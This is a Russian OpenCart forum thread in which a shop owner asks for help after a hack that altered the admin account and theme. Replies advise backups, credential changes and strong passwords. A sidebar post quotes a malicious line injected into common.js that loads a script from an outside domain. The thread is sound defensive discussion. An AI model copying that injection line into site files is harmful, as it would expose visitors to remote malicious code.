Перейти к содержанию

Рекомендуемые сообщения

Здравствуйте, взломали ocstore 2.3+купленный шаблон, больше никаких модулей не ставил. Похерили шаблон- показывает ошибку "Error: A theme has not been assigned to this store!". Заменили мыло, логин админа и зачем-то изменили в админке адрес лога об ошибках на dark.php. Возможно сделали что-то ещё.

Учётку восстановил через БД, но если шаблон поставить на дефолтный, всё равно выдает ту же ошибку.

Всё сносить и ставить заново? На сайте было не очень много информации, но если такое произойдет на рабочем магазине...

 

Во всём полностью виноват сам- не принял меры по защите.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Только что, Smilo сказал:

Здравствуйте, взломали ocstore 2.3+купленный шаблон, больше никаких модулей не ставил. Похерили шаблон- показывает ошибку "Error: A theme has not been assigned to this store!". Заменили мыло, логин админа и зачем-то изменили в админке адрес лога об ошибках на dark.php. Возможно сделали что-то ещё.

Учётку восстановил через БД, но если шаблон поставить на дефолтный, всё равно выдает ту же ошибку.

Всё сносить и ставить заново? На сайте было не очень много информации, но если такое произойдет на рабочем магазине...

 

Во всём полностью виноват сам- не принял меры по защите.

А перевести это не пытались?
"Error: A theme has not been assigned to this store!"
т.е.
«Ошибка: тема не была назначена в этот магазин!»
включите шаблон

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

admin / admin

Несложно взломать

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Возможно, вы не у тех людей ( не у автора шаблона, а у кого-то другого, нехорошего человека) купили шаблон.

Тогда проблема повторится.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2 часа назад, Smilo сказал:

Всё сносить и ставить заново?

Восстановить бекап файлов и бд рабочего сайта.

Не знаете как - пишите хостеру.

А потом меняйте доступы, в том числе и на хостинг

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4 часа назад, AWARO сказал:

А перевести это не пытались?
"Error: A theme has not been assigned to this store!"
т.е.
«Ошибка: тема не была назначена в этот магазин!»
включите шаблон

Мне это и переводить не нужно, тут и так всё понятно было. Забыл, что в модулях есть вкладка "шаблоны", там да, включил, заработало, спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
3 часа назад, jaffagold сказал:

Возможно, вы не у тех людей ( не у автора шаблона, а у кого-то другого, нехорошего человека) купили шаблон.

Тогда проблема повторится.

Покупал тут, через форум.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
3 часа назад, chukcha сказал:

admin / admin

Несложно взломать

пароль я менял)) а вот логин нет - будет мне урок))

 

Как бы теперь от вот этой дряни в углу, музыки и другого избавиться.

 

турки.JPG

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

.

 

Изменено пользователем Smilo

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не используйте легких паролей в админ части - легко ломаются бутфорсом
Скорее всего так и было
А потом уже дело техники подсунуть вам щелл

Удаляете все на сервере, подымаете бекап и изменяете пароль админки

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2 часа назад, Rubynoid сказал:

Восстановить бекап файлов и бд рабочего сайта.

Не знаете как - пишите хостеру.

А потом меняйте доступы, в том числе и на хостинг

теперь то я буду делать бэки)))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
1 минуту назад, markimax сказал:

Не используйте легких паролей в админ части - легко ломаются бутфорсом
Скорее всего так и было
А потом уже дело техники подсунуть вам щелл

Удаляете все на сервере, подымаете бекап и изменяете пароль админки

Больше не буду делать легкие пароли. Непонятно, как меня турки нашли вообще. Я тут ссылку оставил 1 раз, ну и в региональном поиске яши я на 1 странице всего неделю.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

сисадмины и вэбмастера делятся на 3 категории:

те кто еще не делает бэкапы,

те, кто уже делает бэкапы,

и тех, кто уже делает и проверяет возможность восстановления

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
52 минуты назад, Smilo сказал:

теперь то я буду делать бэки)))

Даже если вы их не сделали, то на нормальном хостинге они есть. Пишите хостеру - восстановит.

Изменено пользователем Rubynoid

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
49 минут назад, Rubynoid сказал:

Даже если вы их не сделали, то на нормальном хостинге они есть. Пишите хостеру - восстановит.

 

Действительно есть))

 

Не подскажите, какой бэкап нужно выбрать?

  • всего аккаунта (файлы и базы данных);
  • всех файлов;
  • файлов отдельного сайта;
  • отдельной базы данных.

Не хочу гадать, но скорее всего первый вариант?)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
7 часов назад, Smilo сказал:

 

Действительно есть))

 

Не подскажите, какой бэкап нужно выбрать?

  • всего аккаунта (файлы и базы данных);
  • всех файлов;
  • файлов отдельного сайта;
  • отдельной базы данных.

Не хочу гадать, но скорее всего первый вариант?)

первый

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
9 часов назад, Rubynoid сказал:

первый

Спасибо)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
21 час назад, markimax сказал:

Не используйте легких паролей в админ части - легко ломаются бутфорсом

Что такое "лёгкий пароль"?

 

И заодно в тему: Существует рекомендация регулярно менять пароли даже если сайт не был взломан - просто тупо по графику. ЗАЧЕМ их менять по графику?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

График это условное понятие

Можно просто настроить, время жизни пароля

И после eol  тупо бросать на страницу смены пароля

Это конечно хорошая практика, но есть и нюансы..

Не забывайте, что взлом это еще и человеческий фактор

 

Кто-то любит писать карандашам на мониторе пароль, кто-то в телефон

Кто-то пользуется облачными сервисами хранения, но везде нужен пароль!!!
У кого-то один пароль на все,
Кто-то генерит пароль, а потом забывает..
Кто-то имеет алгоритмы запоминания и генерации

 

Как-то давно прочитал интересный факт, что самый надежный пароль состоял из одной цифры, не, не 1.
Т.е. ломаются пароли определенными алгоритмами, ну никак алгоритмы не учитывали эту одну цифру..
Давно это было, если не изменяет память, это когда mail.ru ограничил пароль то ли 4мя, то ли 6ью символмаи

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
7 часов назад, chukcha сказал:

Можно просто настроить, время жизни пароля

И после eol  тупо бросать на страницу смены пароля

Это конечно хорошая практика,

Почему она хорошая? Что именно делает её хорошей?

Каким образом, (за счёт каких факторов), пароль который не меняли пять лет становится уязвимей пароля которому пять часов (если по остальным факторам, например, длина и всё такое, они равноценны)?

Вот, предположим есть пароль: 12 символов из цифр и букв разных регистрах, текст не осмысленный, нигде больше не используется. Паролю пять лет. Давно пора менять? Появилась уязвимость связанная с отсутствием смены пароля в течении целых пяти лет? Почему надёжный пароль перестаёт быть надёжным?

 

Просто интересно в рамках процесса общего познания окружающего мира.:)

Изменено пользователем florapraktik

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4 часа назад, florapraktik сказал:

Почему надёжный пароль перестаёт быть надёжным?

За 5 лет может пройти компрометация пароля.
Украли записную книжку, подсмотрели, вскрыли.. Не важно!
Важно - срок.

В крупных организациях, устанавливают срок хранения паролей до 3-х месяцев ( я предпочитал - 1-2)

Кроме того, смена пароля, это еще автоматический контроль присутствия сотрудника на рабочем месте..
Из былого
Звонит барышня.. Тут мне прислали задачу, нужно сделать срочно, а в систему не пускает.
А система была так построена, что если пароль не менялся 2 месяца, и активности не было более 3-х юзер тупо блокировался.

А в этой системе барышня, должна была жить хотя бы 1 час в неделю, согласно должностным обязанностям. Это была некая внутренняя система учета мат ценностей.

Вот что мне надо было делать? Я всего лишь админ, но не управленец, чтоб ее учить, наказывать. Но и делать такие вещи без указания сверху тоже не могу, ибо потмо накажут не ее, а меня за самовольное вмешательство..
Конечно, все закончилось полюбовно, Выпили шоколоду и съели коньяк, в том числе и с руководством. Но на след этапе работы, барышня очень строго следила за собой в системе, и.. других поучала (ибо стоимость шоколада и коньяка при ее зарплате этому очень способствовала)

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 09.10.2017 в 20:30, Smilo сказал:

зачем-то изменили в админке адрес лога об ошибках на dark.php

Посмотрите по дате изменения, и сопоставьте с датой других итераций. И вопрос, что в этом файле? Возможно это шелл, который залили в папку логов, на которые были повешены три топора например...

 

А по поводу паролей - надежный пароль считается случайно сгенерированный пароль длиною не менее 15 символов, содержащий большие, малые буквы, цифры и спецсимволы. например ZcS2lk6AiU8%7uFyZ^LJ Правда со спецсимволами иногда не прокатывает, во многих WEB системах они запрещены.

 

Запоминать такое конечно же не реально, но для этого есть куча менеджеров паролей, как платных так и бесплатных. Но обязательно что бы они шифровали базу паролей мастер-паролем.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Похожий контент

    • От IIIBarsik
      Старый сайт:
      OcStore 1.5 
      Тема стандартная (defaut) 
       
      Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 
      что то такое (картинка из инета)

      В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 
      Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 
      <?php foreach ($scripts as $script) { ?> <script type="text/javascript" src="<?php echo $script; ?>"></script> <?php } ?> Понимаю, что данная херота может инклудится вот сюда из любого файла
      Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js
      В конце файла была приписка:
      document.write('<script src="https://afrodizinlife.gq"><\x2fscript>'); Собственно вопрос:
      Как такие вещи вообще происходят на opencart?
      P.S. По поводу паролей можно не писать: 
      1. 10 значные с спецсимволами + регистры
      2. В браузере не храню
      3. В FileZilla тоже не храню
      Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 
      Или какие то минимумы, что необходимо сделать всем и вся? 
    • От Kompanetsr
      Добрый день!
       
      Ребят, кто понимает, в чем может быть проблема?
      Вы не могли бы взглянуть на сайт, либо взлом, либо проблема с шаблоном... Перед этим всем в карточках товара вылазила ошибка 500
      Пробовали делать Бэк-ап, но на следующий день снова имеем то, что имеем (кривую главную страницу и всё)
      mnogo-mozaiki.ru
       
      Для удобства и быстроты связи можете писать в вотсап 89150803060 Роман
    • От mirek
      498.00 руб
      Скачать/Купить дополнение


      Двух факторная Google авторизация для админ панели
      Модуль позволяет обезопасить ваш интернет-магазин на базе OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту административной части магазина. Даже в том случае если злоумышленник получил логин и пароль от админ панели Вашего магазина  - он не сможет войти! Модуль активирует вход в админ панель магазина используя двух факторную Google авторизацию!

       
      Коды доступа меняются с интервалом в 30 секунд!
       
      Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство
      приложение Google Authenticator!  Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации
      на Вашем сайте

      Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве!

      Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени 
      между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете
      для получения кодов для прохождения двух факторной Google авторизации

      Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! 
       
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.
       Тип распространения:
      as is (как есть)  
      Установка:
      Для установки модуля users2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений
      загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в настройках пользователей админ панели появится пункт "Использовать 2fa google авторизацию" Добавил mirek Добавлено 02.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Не проверялось  
    • От mirek
      300.00 руб
      Скачать/Купить дополнение


      Двух факторная Google авторизация для покупателей
      Модуль позволяет обезопасить доступ к профилю покупателей на сайтах с CMS OcStore/OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту профиля покупателя магазина. Даже в том случае если злоумышленник получил логин и пароль от профиля покупателя магазина  - он не сможет войти! Модуль активирует вход в профиль покупателя магазина используя двух факторную Google авторизацию!

      Модуль интегрируется в стандартную тему OcStore/Opencart
       
      Коды доступа меняются с интервалом в 30 секунд!

      Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство
      приложение Google Authenticator!  Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации
      на Вашем сайте

      Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве!

      Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени 
      между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете
      для получения кодов для прохождения двух факторной Google авторизации

      Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! 
       
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.
       Тип распространения:
      as is (как есть)  
      Установка:
      Для установки модуля customers2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений
      загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в меню профиля покупателя появятся пункты "2fa google авторизация"   
      Добавил mirek Добавлено 07.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua/ Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Не проверялось  
    • От ArtemPitov
      498.00 руб
      Скачать/Купить дополнение


      Защита от вирусов и хакеров
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
      Добавил ArtemPitov Добавлено 14.01.2018 Категория Модули Системные требования PHP 5.4 и выше Сайт разработчика https://pitov.pro Старая цена 1000 Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х
      Не проверялось  
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.